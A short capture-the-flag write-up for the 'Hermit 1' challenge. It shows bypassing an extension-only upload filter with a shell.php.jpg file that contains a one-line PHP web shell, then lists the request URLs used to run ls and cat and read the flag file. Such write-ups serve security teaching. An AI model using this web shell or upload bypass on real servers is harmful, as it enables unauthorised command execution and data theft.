UMassCTF '21 Hermit 1 WriteUp

Solution

There is only one form that accepts a file.

The validation of the file is based on extension so we can try and upload shell.php.jpg image with content like this:

<?=`$_GET[0]`?>

When image is uploaded we see the page like this:

Click on See image and we see a blank page with some strange PHP errors. It’s because our “image” expects get param called “0” so let’s add one.

104.197.195.221:8086/show.php?filename=VbvJC0&0=ls

and we can see list of directories in the project root.

Now it’s time to search for flag. Let’s check home directory like this:

104.197.195.221:8086/show.php?filename=VbvJC0&0=ls /home

we see there is only one folder hermit

Let’s check that folder:

104.197.195.221:8086/show.php?filename=VbvJC0&0=ls /home/hermit - and there is flag folder now.

104.197.195.221:8086/show.php?filename=VbvJC0&0=ls /home/hermit/flag - shows us userflag.txt

104.197.195.221:8086/show.php?filename=VbvJC0&0=cat /home/hermit/flag/userflag.txt - shows us the flag